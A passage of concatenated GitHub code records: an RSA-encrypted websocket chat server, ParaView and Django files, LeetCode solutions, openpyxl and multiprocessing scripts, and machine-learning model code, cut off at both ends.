nb64)\n    userPbk = create_public_key(e, n)\n    client_public_keys[client_id] = userPbk\n\n    server_prk = generate_new_private_key()\n    server_private_keys[client_id] = server_prk\n    e_serverb64, n_serverb64 = encode_public_keynumbers(\n        server_prk.public_key().public_numbers()\n    )\n\n    server.send_message(\n        client,\n        format_message(\n            'registration_success',\n            {\n                'e': e_serverb64,\n                'n': n_serverb64\n            }\n        )\n    )\n\n    server.send_message_to_all(\n        format_message(\n            'client_joined_chat',\n            {\n                'username': username\n            }\n        )\n    )\n\n    # Editor's fix: use the shared lock instead of a throwaway local one.\n    with KEYS_LOCK:\n        server_new_private_keys[client_id] = server_prk\n\n\ndef on_check_username(client, msg):\n    data = msg['data']\n    username = data['username']\n    if username in usernames.values():\n        server.send_message(client, format_message('username_taken', {}))\n    else:\n        server.send_message(client, format_message('username_available', {}))\n\n\ndef on_chat_message(client, msg):\n    data = msg['data']\n    client_id = client['id']\n    username = usernames[client_id]\n\n    eb64, nb64 = data['e'], data['n']\n    e, n = decode_public_keynumbers(eb64, nb64)\n    client_public_keys[client_id] = create_public_key(e, n)\n    private_key = server_private_keys[client_id]\n\n    message_blocks = msg['message_blocks']\n    message_bytes = []\n    for block in message_blocks:\n        block_decoded = base64.b64decode(block)\n        block_decrypted = decrypt(block_decoded, private_key)\n        message_bytes += block_decrypted\n\n    
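# Re-encrypt the plaintext for every registered client in RSA-sized chunks\n    # (the 245-byte block size below matches a 2048-bit key with PKCS#1 v1.5\n    # padding, 256 - 11 bytes -- an editor's assumption).\n    for curr_client in server.clients:\n        curr_client_id = curr_client['id']\n        if curr_client_id not in 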
usernames:\n            continue\n        curr_client_pbk = client_public_keys[curr_client_id]\n\n        # Editor's fix: use the shared module-level lock; the original created a\n        # per-iteration Lock() that could always be acquired and guarded nothing.\n        if KEYS_LOCK.acquire(blocking=False):\n            try:\n                private_key = server_new_private_keys[client_id]\n                server_private_keys[client_id] = private_key\n            finally:\n                KEYS_LOCK.release()\n        else:\n            private_key = server_private_keys[client_id]\n\n        message_blocks_encrypted = []\n        message_bytes_original = message_bytes\n\n        while len(message_bytes_original) != 0:\n            block = message_bytes_original[:245]\n            block_encrypted = encryptb64(block, curr_client_pbk)\n            block_encoded = block_encrypted.decode('ascii')\n            message_blocks_encrypted.append(block_encoded)\n            message_bytes_original = message_bytes_original[245:]\n        message_data = {\n            'username': username,\n        }\n        event_type = 'chat_message_received'\n        if curr_client_id == client_id:\n            # ::before\n            # new_key = generate_new_private_key()\n            # server_private_keys[curr_client_id] = new_key\n            e_private, n_private = encode_public_keynumbers(private_key.public_key().public_numbers())\n            message_data['e'] = e_private\n            message_data['n'] = n_private\n            event_type = 'my_chat_message_received'\n\n        server.send_message(\n            curr_client,\n            format_message(\n                event_type,\n                message_data,\n                message_blocks_encrypted\n            )\n        )\n\n\ndef on_client_left_chat(client, msg):\n    client_id = client['id']\n    if client_id in usernames:\n        username = usernames[client_id]\n\n        server.send_message_to_all(\n            format_message(\n                'client_left_chat',\n                {\n                    'username': username\n                }\n            )\n        )\n\n        del usernames[client_id]\n        if client_id in client_public_keys:\n            del client_public_keys[client_id]\n        if client_id in server_private_keys:\n            del server_private_keys[client_id]\n\n\nhandlers = {\n    \"check_username\": on_check_username,\n    \"register\": on_register,\n    \"chat_message\": on_chat_message,\n    \"client_left_chat\": on_client_left_chat\n}\n\n\ndef generate_keys():\n    while True:\n        # Editor's fix: hold the shared lock while refreshing the keys.\n        with KEYS_LOCK:\n            print(\"Lock acquired.\")\n            for client_id in usernames.keys():\n                prk = generate_new_private_key()\n                server_new_private_keys[client_id] = prk\n        print(\"Lock released.\")\n        sleep(30)\n\n\nkey_generator_thread = threading.Thread(target=generate_keys)\nkey_generator_thread.daemon = True\nkey_generator_thread.start()\n\nserver = WebsocketServer(5000, host='127.0.0.1', loglevel=logging.DEBUG)\nserver.set_fn_new_client(on_new_client)\nserver.set_fn_message_received(on_message)\nserver.set_fn_client_left(on_client_left_chat)\nserver.run_forever()\n","repo_name":"max810/RSA-emx","sub_path":"server/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6473,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"36876983390","text":"#### Verify that Merge Blocks produces polydata output when inputs are polydata\nfrom paraview.simple import *\nfrom paraview import servermanager as sm\nfrom paraview import smtesting\nimport os;\n\n# This test makes sure that the GMV reader can read vertices and lines.\n\nsmtesting.ProcessCommandLineArguments()\n\nGMVDir = os.path.join(smtesting.DataDir, \"Plugins\", \"GMVReader\", \"Testing\", \"Data\", \"GMV\")\n\n# load plugin\nLoadDistributedPlugin('GMVReader', ns=globals())\n\n# create a new 'GMV Reader'\none_vertexgmv = GMVReader(registrationName='one_vertex.gmv',\n                          FileNames=[os.path.join(GMVDir, \"one_vertex.gmv\")])\none_vertexgmv.CellArrayStatus = ['material id']\n\nassert(sm.Fetch(one_vertexgmv).GetBlock(1).GetNumberOfVerts() == 3)\n\n# create a new 'GMV Reader'\ntwo_vertexgmv = 
GMVReader(registrationName='two_vertex.gmv',\n FileNames=[os.path.join(GMVDir, \"two_vertex.gmv\")])\ntwo_vertexgmv.CellArrayStatus = ['material id']\n\nassert(sm.Fetch(two_vertexgmv).GetBlock(1).GetNumberOfLines() == 2)\n","repo_name":"Kitware/ParaView","sub_path":"Plugins/GMVReader/Testing/Python/GMVReaderOneOrTwoVertices.py","file_name":"GMVReaderOneOrTwoVertices.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":1099,"dataset":"github-code","pt":"77"} +{"seq_id":"1740628338","text":"from distutils.core import setup\nfrom distutils.extension import Extension\nfrom Cython.Build import cythonize\n\n\nhashmodule_extensions = [\n Extension(\n name=\"lackeyhash\",\n sources=[\"pylackeyhash.pyx\", \"src/lackeyhash.c\"],\n library_dirs=[\"src\"],\n include_dirs=[\"src\"],\n )\n]\n\nsetup(\n name=\"lackeyhash\",\n version=\"0.1.0\",\n description=\"Custom hash function used by LackeyCCG.\",\n long_description=\"Reimplementation of Lackey's file hashing routine in C as a python module.\",\n author=\"Dan Peavey\",\n author_email=\"danpeavey@gmail.com\",\n url=\"https://github.com/sunmachine/lackeyhasher/\",\n ext_modules=cythonize(hashmodule_extensions, language_level=\"3\"),\n)\n","repo_name":"sunmachine/lackeyhasher","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72831856569","text":"\"\"\"djangle forum URL Configuration\n\nThe `urlpatterns` list routes URLs to views.\n\"\"\"\nfrom django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^create/board/$', views.create_board, name='create_board'),\n url(r'^create/moderation/(?P\\d*)/?$', views.manage_user_mod, name='edit_mod'),\n url(r'^create/boardmoderation/(?P\\w+)/?$', views.manage_board_mod, name='board_mod'),\n url(r'^create/thread/$', views.create_thread, name='create_thread'),\n url(r'^board/(?P\\w+)/(?P\\d*)/?$', views.board_view, name='board'),\n url(r'^thread/(?P\\d+)/(?P\\d*)/?$', views.thread_view, name='thread'),\n url(r'^post/(?P\\d+)/(?Pup)/?$', views.vote_view, name='pos_vote'),\n url(r'^post/(?P\\d+)/(?Pdown)/?$', views.vote_view, name='neg_vote'),\n url(r'^profile/(?P[\\w\\+\\-@_\\.]+)/$', views.profile, name='profile'),\n url(r'^edit/profile/$', views.edit_profile, name='edit_profile'),\n url(r'^edit/profile/(?Pfirst_name)/$', views.reset_user_field, name='reset_first_name'),\n url(r'^edit/profile/(?Plast_name)/$', views.reset_user_field, name='reset_last_name'),\n url(r'^edit/profile/(?Pavatar)/$', views.reset_user_field, name='reset_avatar'),\n url(r'^post/(?P\\d+)/delete/$', views.del_post, name='del_post'),\n url(r'^comment/post/(?P\\d+)/$', views.comment, name='comment'),\n url(r'^comment/(?P\\d+)/delete/$', views.del_comment, name='del_comment'),\n url(r'^thread/(?P\\d+)/subscribe/$', views.subscribe, name='subscribe'),\n url(r'^thread/(?P\\d+)/unsubscribe/$', views.unsubscribe, name='unsubscribe'),\n url(r'^thread/(?P\\d+)/close/$', views.toggle_close_thread, name='toggle_close_thread'),\n url(r'^thread/(?P\\d+)/stick/$', views.stick_thread, name='stick_thread'),\n url(r'^tag/(?P\\w+)/(?P\\d*)/?$', views.tag_view, name='tag'),\n url(r'^manage/supermods/$', views.manage_supermods, name='supermods'),\n url(r'^manage/supermods/toggle/(?P\\d+)/$', views.supermod_toggle, name='supermod_toggle'),\n url(r'^manage/moderators/$', views.moderators_view, 
name='moderators'),\n    url(r'^remove/moderation/(?P\\d+)/(?P\\w+)', views.remove_mod, name='remove_mod'),\n    url(r'^manage/ban/(?P\\d+)/$', views.ban_user, name='ban_user'),\n    url(r'^manage/unban/(?P\\d+)/$', views.unban_user, name='unban_user'),\n    url(r'^search/(?P\\d*)/?$', views.search, name='search'),\n    url(r'^search/new/$', views.new_search, name='new_search')\n]\n","repo_name":"donkeyxote/djangle","sub_path":"djangle/forum/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"33618884912","text":"'''\r\nWrite a separar() function that takes a list of integers and returns two sorted lists: \r\nthe first with the even numbers, and the second with the odd numbers.\r\nTo solve this problem, the user is required \r\nto write a script and define a function called separar(). \r\nAs an input parameter it receives a list of integers. \r\nThe list should be created as lista=[1,2,3,4]. The function returns \r\ntwo lists of the form: lista1=[even numbers], \r\nlista2=[odd numbers]\r\n'''\r\nnum = [-12, 84, 13, 20, -33, 101, 9]\r\ndef separar(lista): # Define the function\r\n    lista.sort() # sort() orders the list in place (editor's fix: use the parameter, not the global)\r\n    pares = []\r\n    impares = []\r\n    for n in lista:\r\n        if n%2 == 0:\r\n            pares.append(n) # append() adds to the end of the list \r\n        else:\r\n            impares.append(n) \r\n    return pares, impares\r\n\r\npares, impares = separar(num)\r\nprint(pares)\r\nprint(impares)","repo_name":"keren-sofia/manejo_de_funciones","sub_path":"Ejer. Manejo de funciones.py","file_name":"Ejer. Manejo de funciones.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"14991444715","text":"# 835. Image Overlap\n# 🟠 Medium\n#\n# https://leetcode.com/problems/image-overlap/\n#\n# Tags: Array - Matrix\n\nimport timeit\nfrom collections import Counter, defaultdict\nfrom typing import List\n\n\n# Store all positions that hold 1s in each matrix in a list. Then\n# iterate over each combination of positions in the list computing the\n# vector between them and adding 1 to the count of times that we have\n# seen the given vector. 
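For example, if\n# img1 has 1s at (0,0) and (1,1) while img2 has 1s at (1,0) and (2,1), both\n# pairs produce the vector (1, 0), so its count reaches 2 (editor's example).\n# 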
The solution to the problem will come from\n# shifting the matrix using the most common vector and it will equal the\n# number of positions in a and b that have that vector in common.\n#\n# Time complexity: O(n^4) - In the worst case each position in both\n# matrixes would have a 1 O(n^2) and we would check each combination of\n# them O((n^2)*(n^2)).\n# Space complexity: O(n^2) - Either list and also the dictionary could\n# grow to size n*n.\n#\n# Runtime: 938 ms, faster than 59.65%\n# Memory Usage: 14.6 MB, less than 43.86%\nclass VectorCounts:\n def largestOverlap(\n self, img1: List[List[int]], img2: List[List[int]]\n ) -> int:\n # Store the length of both of the matrixes height and width.\n N = len(img1)\n # Store all positions that have a 1 in a and b.\n ones_in_a, ones_in_b = [], []\n for i in range(N):\n for j in range(N):\n if img1[i][j]:\n ones_in_a.append((i, j))\n if img2[i][j]:\n ones_in_b.append((i, j))\n # Store a dictionary of vectors pointing to the number of times\n # we have seen that exact vector between two ones.\n count = defaultdict(int)\n # Store the highest count of matching vectors seen so far.\n res = 0\n for a_cell in ones_in_a:\n for b_cell in ones_in_b:\n vector = (b_cell[0] - a_cell[0], b_cell[1] - a_cell[1])\n count[vector] += 1\n if count[vector] > res:\n res = count[vector]\n return res\n\n\n# There is an interesting solution that flattens the positions with ones\n# in both matrixes into lists and then checks their difference, the\n# concept is similar to the previous solution but I thought that it was\n# interesting enough to add it here.\n#\n# The original post is at:\n# https://leetcode.com/problems/image-overlap/discuss/130623/C%2B%2BJavaPython-Straight-Forward\n#\n# Time complexity: O(N^4) - The original post gives it as O(AB + N^2)\n# with A and B the number of 1s in A and B, as the number of 1s grows in\n# the matrixes, A*B approaches n^4.\n# Space complexity: O(n^2) - The original post gives it as O(A+B) which\n# becomes O(n^2) when the entire matrix is made of 1s.\n#\n# Runtime: 567 ms, faster than 86.55%\n# Memory Usage: 14.4 MB, less than 64.33%\nclass FlattenMatrix:\n def largestOverlap(\n self, img1: List[List[int]], img2: List[List[int]]\n ) -> int:\n N = len(img1)\n NN = N * N\n la = [i // N * 100 + i % N for i in range(NN) if img1[i // N][i % N]]\n lb = [i // N * 100 + i % N for i in range(NN) if img2[i // N][i % N]]\n c = Counter(i - j for i in la for j in lb)\n return max(c.values() or [0])\n\n\ndef test():\n executors = [\n VectorCounts,\n FlattenMatrix,\n ]\n tests = [\n [[[0]], [[0]], 0],\n [[[1]], [[1]], 1],\n [\n [[1, 1, 0], [0, 1, 0], [0, 1, 0]],\n [[0, 0, 0], [0, 1, 1], [0, 0, 1]],\n 3,\n ],\n ]\n for executor in executors:\n start = timeit.default_timer()\n for _ in range(1):\n for col, t in enumerate(tests):\n sol = executor()\n result = sol.largestOverlap(t[0], t[1])\n exp = t[2]\n assert result == exp, (\n f\"\\033[93m» {result} <> {exp}\\033[91m for\"\n + f\" test {col} using \\033[1m{executor.__name__}\"\n )\n stop = timeit.default_timer()\n used = str(round(stop - start, 5))\n cols = \"{0:20}{1:10}{2:10}\"\n res = cols.format(executor.__name__, used, \"seconds\")\n print(f\"\\033[92m» {res}\\033[0m\")\n\n\ntest()\n","repo_name":"raul-sauco/coding-challenges","sub_path":"leetcode/image-overlap.py","file_name":"image-overlap.py","file_ext":"py","file_size_in_byte":4119,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"43816804032","text":"import collections, 
heapq\nclass Solution:\n    \"\"\"\n    You are given a network of n nodes, labeled from 1 to n. You are also given times, a list of travel times as directed edges times[i] = (ui, vi, wi), where ui\n    is the source node, vi is the target node, and wi is the time it takes for a signal to travel from source to target.\n    We will send a signal from a given node k. Return the minimum time it takes for all the n nodes to receive the signal. \n    If it is impossible for all the n nodes to receive the signal, return -1.\n    \"\"\"\n    def networkDelayTime(self, times: List[List[int]], n: int, k: int) -> int:\n        # This problem will require Dijkstra's Algo\n        # Create a dictionary of all the nodes, where u is the source node, v is the target, and w is the time taken\n        edges = collections.defaultdict(list)\n        for u, v, w in times:\n            edges[u].append((v, w))\n        # Create a minHeap to store min edges, and create a visited set\n        minHeap = [(0, k)]\n        visit = set()\n        # Initialize the time\n        t = 0\n        # We will run Dijkstra's best-first search, so loop while the heap still has elements \n        while minHeap:\n            # Pop the element in the heap which is closest to the source i.e. the one with the lowest time to reach\n            w1, n1 = heapq.heappop(minHeap)\n            # If we have already visited this node previously, a quicker path already exists, so go to the next iteration\n            if n1 in visit:\n                continue\n            # Add this node to the visited set\n            visit.add(n1)\n            # Set t to the time it took to reach this node\n            t = w1\n            # For every neighbor of this node\n            for n2, w2 in edges[n1]:\n                # If we haven't already visited the neighbor\n                if n2 not in visit:\n                    # Add this node to the heap, and set the time it takes to reach this node as (time it takes to reach n1) + (time to reach n2 from n1)\n                    heapq.heappush(minHeap, (w1 + w2, n2))\n        # Return t if we were able to visit every node and check it via Dijkstra's. 
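\n        # Example (editor's sketch): times = [[2,1,1],[2,3,1],[3,4,1]], n = 4, k = 2 -> answer 2.\n        # 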
If we couldn't reach every node, return -1\n return t if len(visit) == n else -1\n ","repo_name":"aroy105/LeetCode","sub_path":"AdvancedGraphs/743-network_time_delay.py","file_name":"743-network_time_delay.py","file_ext":"py","file_size_in_byte":2214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"34812139320","text":"import matplotlib.pyplot as plt\nimport os\n\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom prompt_toolkit import prompt\nfrom prompt_toolkit.history import InMemoryHistory\n\nfrom wusn.commons import WusnOutput, WusnInput\n\n\nif __name__ == '__main__':\n history = InMemoryHistory()\n plt.ioff()\n\n print('Enter a path to an input/output file to view its plot.')\n print('Ctrl+C or Ctrl+D to exit.')\n\n try:\n while True:\n path = prompt('> ', history=history)\n if not os.path.exists(path):\n print('No such path exists.')\n continue\n\n try:\n if path.endswith('.test'):\n obj = WusnInput.from_file(path)\n else:\n obj = WusnOutput.from_text_file(path)\n except Exception:\n print('Failed to open file.')\n continue\n\n fig = plt.figure()\n ax = Axes3D(fig)\n obj.plot(ax, highlight_max=False)\n ax.legend()\n plt.show()\n fig.clf()\n\n except (KeyboardInterrupt, EOFError):\n print()\n","repo_name":"lanPN85/wusn","sub_path":"interactive_plot.py","file_name":"interactive_plot.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"11878972033","text":"from multiprocessing import Process\nfrom datetime import datetime\n\nfrom .appointments import start_appointment_job\n\nfrom services.appointments import get_appointments\n\nWORKERS = {}\n\n\ndef terminate_worker(worker):\n try:\n worker.terminate()\n worker.join()\n worker.close()\n except Exception as err:\n print('====> Error occurred terminating process', err)\n\n\ndef schedule_appointment(appointment):\n appointment_id = str(appointment['_id'])\n worker = Process(target=start_appointment_job, args=(appointment,))\n worker.start()\n WORKERS[appointment_id] = worker\n\n\ndef update_scheduled_appointment(appointment_id, updated_appt):\n worker = WORKERS[appointment_id]\n terminate_worker(worker)\n new_worker = Process(target=start_appointment_job, args=(updated_appt,))\n new_worker.start()\n WORKERS[appointment_id] = new_worker\n\n\ndef delete_scheduled_appointment(appointment_id):\n worker = WORKERS[appointment_id]\n terminate_worker(worker)\n del WORKERS[appointment_id]\n\n\ndef init_workers():\n print('=====> Initializing workers')\n appts = get_appointments({})\n for appt in appts:\n if datetime.now() > appt['time']:\n continue\n schedule_appointment(appt)\n\n\ndef close_workers():\n for appointment_id, worker in WORKERS.items():\n terminate_worker(worker)\n","repo_name":"Favouroked/twilio_appointments","sub_path":"jobs/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40954808191","text":"from __future__ import absolute_import\n\n# Built-in modules\nimport abc\n\n# Third party modules\n\n# Own modules\nfrom microprobe.exceptions import MicroprobeArchitectureDefinitionError\nfrom microprobe.utils.imp import find_subclasses\nfrom microprobe.utils.logger import get_logger\nfrom microprobe.utils.typeguard_decorator import typeguard_testsuite\n\n# Constants\nLOG = get_logger(__name__)\n__all__ = [\"import_classes_from\", 
\"Comparator\"]\n\n\n# Functions\n@typeguard_testsuite\ndef import_classes_from(modules):\n \"\"\"\n\n :param modules:\n\n \"\"\"\n\n LOG.info(\"Start\")\n classes = {}\n\n for module_str in modules:\n for cls in find_subclasses(module_str, Comparator):\n\n name = cls.__name__\n if name in classes:\n raise MicroprobeArchitectureDefinitionError(\n \"Duplicated \"\n \"definition\"\n \" of Comparator '%s' \"\n \"in module '%s'\" % (name, module_str))\n LOG.info(\"%s comparator imported\", name)\n classes[name] = cls\n\n if len(classes) == 0:\n LOG.warning(\"No comparators imported.\")\n\n LOG.info(\"End\")\n return list(classes.values())\n\n\n# Classes\n@typeguard_testsuite\nclass Comparator(object, metaclass=abc.ABCMeta):\n \"\"\"Abstract class to perform comparisons. :class:`~.Comparator`\n objects are in charge of performing comparisons between values\n while providing an architecture independent and modular interface.\n They are registered in an :class:`~.ISA` object using the\n :meth:`~.ISA.register_value_comparator`.\n Once registered, whenever a comparison is needed to perform a\n given operation, it is possible to check (:meth:`check`) if\n the :class:`~.Comparator` can perform the requested comparison,\n and if so, it can generate (:meth:`generate`) the required\n :class:`~.list` of :class:`~.Instruction` to perform it.\n\n :param isa: Architecture to operate on.\n\n \"\"\"\n\n def __init__(self, arch):\n \"\"\"\n\n :param arch:\n\n \"\"\"\n self._arch = arch\n\n @abc.abstractmethod\n def check(self, reg, value):\n \"\"\"Checks whether the :class:`~.Register` *reg* instance can\n be compared with the *value*, which can be a ::class:`~.int` or another\n :class:`~.Register`. If is not possible to perform the\n comparison, a `None` value is returned. Otherwise, the\n :class:`~.Register` instance where the result of the\n comparison would be placed is returned.\n\n :param reg: 1st operand of the comparison.\n :type reg: :class:`~.Register`\n :param value: 2nd operand of the comparison.\n :type value: :class:`~.Register` or ::class:`~.int`\n\n \"\"\"\n raise NotImplementedError\n\n @abc.abstractmethod\n def generate(self, reg, value, helper_instr):\n \"\"\"Generate the :class:`~.Instruction` to perform\n the comparison. 
If the required instruction is found within\n the :class:`~.list` of :class:`~.Instruction`\n *helper_instr*, no new instruction is generated and the matching\n instruction operands are set accordingly.\n\n :param reg: 1st operand of the comparison.\n :type reg: :class:`~.Register`\n :param value: 2nd operand of the comparison.\n :type value: :class:`~.Register` or :class:`~.int`\n :param helper_instr: List of helper instructions.\n :type helper_instr: :class:`~.list` of :class:`~.Instruction`\n instances.\n\n \"\"\"\n raise NotImplementedError\n\n @property\n @abc.abstractmethod\n def instr_name(self):\n \"\"\"Value comparator name, usually the opcode of the instruction it\n uses (:class:`~.str`).\n\n\n \"\"\"\n raise NotImplementedError\n\n @property\n def arch(self):\n \"\"\"Architecture this :class:`~.Comparator` will work on\n (:class:`~.ISA`).\n\n\n \"\"\"\n return self._arch\n","repo_name":"IBM/microprobe","sub_path":"src/microprobe/target/isa/comparator.py","file_name":"comparator.py","file_ext":"py","file_size_in_byte":3924,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"77"} +{"seq_id":"8808912757","text":"import openpyxl\nwb = openpyxl.Workbook()\nx = wb.get_sheet_names()\nprint(x)\n# rename sheet\nsheet = wb.active\nsheet.title = 'Spam Bacon Eggs Sheet'\nx = wb.get_sheet_names()\nprint(x)\n# create sheet\nwb.create_sheet(index=0, title='First Sheet')\nwb.create_sheet(index=2, title='Middle Sheet')\nx = wb.get_sheet_names()\nprint(x)\n# remove sheet\nwb.remove_sheet(wb.get_sheet_by_name('First Sheet'))\nwb.remove_sheet(wb.get_sheet_by_name('Middle Sheet'))\nx = wb.get_sheet_names()\nprint(x)\n# insert data to cell\nsheet = wb.get_sheet_by_name('Spam Bacon Eggs Sheet')\nsheet['A1'] = 'Hello World!'\ny = sheet['A1'].value\nprint(y)\n# Setup font\nfrom openpyxl.styles import Font\nfontStyle = Font(sz=24, i=True)\nsheet['A2'] = 'Hello World!'\nsheet['A2'].font = fontStyle\n# Set row height and column width\nsheet.row_dimensions[1].height = 70\nsheet.column_dimensions['A'].width = 30\nsheet.column_dimensions['B'].width = 0.5\n# Merge Cell\nsheet.merge_cells('A1:C1')\nsheet['A1'] = 'Cells merged together.'\nsheet.merge_cells('A2:C5')\nsheet['A2'] = 'Cells merged together.'\n# Unmerge Cell\nsheet.unmerge_cells('A2:C5')\n# Freeze Panes\nsheet.freeze_panes = 'A2'\n# save file\nwb.save('example_copy.xlsx')\n\n","repo_name":"purplvampire/coding2","sub_path":"excel2.py","file_name":"excel2.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23048874301","text":"import tensorflow as tf\r\nimport os\r\n\r\nfrom time import gmtime, strftime\r\nfrom dataset import *\r\nfrom run import train, train_vae\r\nfrom model import NameGeneration\r\nfrom vae import VAE\r\n\r\n\r\nflags = tf.app.flags\r\nflags.DEFINE_integer(\"vae_epoch\", 30, \"Epoch to train\")\r\nflags.DEFINE_integer(\"ae_epoch\", 500, \"Epoch to train\")\r\nflags.DEFINE_integer(\"gan_epoch\", 10000, \"Epoch to train\")\r\nflags.DEFINE_integer(\"input_dim\", 43, \"Data input dimension + PAD, GO, EOS\")\r\nflags.DEFINE_integer(\"class_dim\", 127, \"Data class dimension\")\r\nflags.DEFINE_integer(\"latent_dim\", 30, \"Latent variable dimension\")\r\nflags.DEFINE_integer(\"batch_size\", 1000, \"Mini-batch size\")\r\nflags.DEFINE_integer(\"max_time_step\", 45, \"Maximum time step of RNN\")\r\nflags.DEFINE_integer(\"min_grad\", -10, \"Minimum gradient to clip\")\r\nflags.DEFINE_integer(\"max_grad\", 10, 
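# --- editor's example (added) ---
# The excel2.py record above relies on openpyxl APIs that were deprecated and
# later removed (get_sheet_names, get_sheet_by_name, remove_sheet). The same
# operations with the current interface -- hedged: exact availability depends
# on your openpyxl version.
import openpyxl

wb = openpyxl.Workbook()
wb.active.title = 'Spam Bacon Eggs Sheet'
wb.create_sheet(index=0, title='First Sheet')
print(wb.sheetnames)                    # replaces wb.get_sheet_names()
sheet = wb['Spam Bacon Eggs Sheet']     # replaces wb.get_sheet_by_name(...)
del wb['First Sheet']                   # replaces wb.remove_sheet(...)
print(wb.sheetnames)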
\"Maximum gradient to clip\")\r\nflags.DEFINE_integer(\"cell_dim\", 200, \"Dimension of RNN cell\")\r\nflags.DEFINE_integer(\"cell_layer_num\", 1, \"The layer number of RNN \")\r\nflags.DEFINE_integer(\"char_dim\", 50, \"Dimension of character embedding\")\r\nflags.DEFINE_integer(\"hidden_dim\", 200, \"Dimension of hidden layer for FFNN\")\r\nflags.DEFINE_float(\"ae_lr\", 5e-3, \"Learning rate of autoencoder\")\r\nflags.DEFINE_float(\"vae_lr\", 1e-2, \"Learning rate of variational autoencoder\")\r\nflags.DEFINE_float(\"cf_lr\", 1e-3, \"Learning rate of classifier\")\r\nflags.DEFINE_float(\"gan_lr\", 1e-3, \"Learning rate of GAN\")\r\nflags.DEFINE_float(\"output_dr\", 0.5, \"Dropout rate of FFNN\")\r\nflags.DEFINE_float(\"cell_keep_prob\", 0.5, \"Keep prob of RNN cell dropout\")\r\nflags.DEFINE_string(\"checkpoint_dir\", \"checkpoint\", \"Directory name to save the checkpoints\")\r\nflags.DEFINE_string(\"results_dir\", \"results\", \"Directory name to save the results\")\r\nflags.DEFINE_string(\"data_dir\", \"data\", \"Directory name to save the results\")\r\nflags.DEFINE_boolean(\"conditional\", False, \"True to use conditional generation\")\r\nflags.DEFINE_boolean(\"is_train\", True, \"True for training, False for testing\")\r\nflags.DEFINE_boolean(\"load_autoencoder\", False, \"True to load pretrained autoencoder\")\r\nflags.DEFINE_boolean(\"train_autoencoder\", True, \"True to train autoencoder\")\r\nflags.DEFINE_string(\"pretrained_path\", \"ae_no_class/pretrained_ae\", \"Path of pretrained ae\")\r\nFLAGS = flags.FLAGS\r\n\r\n\r\ndef create_model(config):\r\n scope = 'NameGeneration-' + strftime(\"%Y%m%d%H%M%S\", gmtime())\r\n config.checkpoint_dir += '/%s' % scope\r\n # ng_model = NameGeneration(config, scope=scope)\r\n ng_model = VAE(config, scope=scope)\r\n return ng_model\r\n\r\n\r\ndef main(_):\r\n print(flags.FLAGS.__flags, '\\n')\r\n\r\n dataset = get_name_data(FLAGS)\r\n ng_model = create_model(FLAGS)\r\n if FLAGS.is_train:\r\n # train(ng_model, dataset, FLAGS)\r\n train_vae(ng_model, dataset, FLAGS)\r\n\r\n\r\nif __name__ == '__main__':\r\n if not os.path.exists(FLAGS.results_dir):\r\n os.makedirs(FLAGS.results_dir)\r\n tf.app.run()\r\n\r\n","repo_name":"jhyuklee/namegen-tensorflow","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31136450755","text":"from keras import backend as K\r\nfrom tensorflow.keras.layers import *\r\nfrom tensorflow.keras.models import Model\r\nfrom parameters import *\r\n\r\ndef conv_bn_act(x, filters, drop_out=0.0):\r\n x = Conv2D(filters, (3, 3), activation=None, padding='same')(x)\r\n\r\n if drop_out > 0:\r\n x = Dropout(drop_out)(x)\r\n\r\n x = BatchNormalization()(x)\r\n x = Activation('relu')(x)\r\n\r\n return x\r\n\r\ndef expend_as(x, n):\r\n y = Lambda(lambda x, repnum: K.repeat_elements(x, repnum, axis=3), arguments={'repnum': n})(x)\r\n return y\r\n\r\ndef attention_layer(d, e, n):\r\n d1 = Conv2D(n, (1, 1), activation=None, padding='same')(d)\r\n e1 = Conv2D(n, (1, 1), activation=None, padding='same')(e)\r\n\r\n concat_de = add([d1, e1])\r\n\r\n relu_de = Activation('relu')(concat_de)\r\n conv_de = Conv2D(1, (1, 1), padding='same')(relu_de)\r\n sigmoid_de = Activation('sigmoid')(conv_de)\r\n\r\n shape_e = K.int_shape(e)\r\n upsample_psi = expend_as(sigmoid_de, shape_e[3])\r\n\r\n return multiply([upsample_psi, e])\r\n\r\ndef df_block(x, filters, compression=0.5, drop_out=0.0):\r\n x1 = 
